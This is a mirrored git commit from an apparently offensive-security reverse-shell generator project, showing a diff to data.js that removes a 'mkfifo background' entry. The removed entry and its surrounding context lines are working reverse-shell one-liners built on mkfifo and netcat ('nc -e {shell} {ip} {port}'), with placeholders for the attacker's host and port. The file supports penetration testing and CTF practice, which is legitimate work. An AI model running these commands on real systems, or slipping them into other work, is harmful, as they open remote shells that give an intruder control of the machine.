mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2025-02-23 15:04:42 +00:00
Update data.js
Removed mkfifo background for now
This commit is contained in:
parent
2b4821d0e6
commit
6dda01a461
@ -50,11 +50,6 @@ const reverseShellCommands = withCommandType(
|
|||||||
"command": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f",
|
"command": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f",
|
||||||
"meta": ["linux", "mac"]
|
"meta": ["linux", "mac"]
|
||||||
},
|
},
|
||||||
{
|
|
||||||
"name:" "mkfifo background",
|
|
||||||
"command": "(mkfifo \/tmp\/MmE1M; nc {ip} {port} 0<\/tmp\/MmE1M | {shell} >\/tmp\/MmE1M 2>&1; rm \/tmp\/MmE1M) &",
|
|
||||||
"meta": ["linux", "mac"]
|
|
||||||
},
|
|
||||||
{
|
{
|
||||||
"name": "nc -e",
|
"name": "nc -e",
|
||||||
"command": "nc -e {shell} {ip} {port}",
|
"command": "nc -e {shell} {ip} {port}",
|
||||||
|
Loading…
Reference in New Issue
Block a user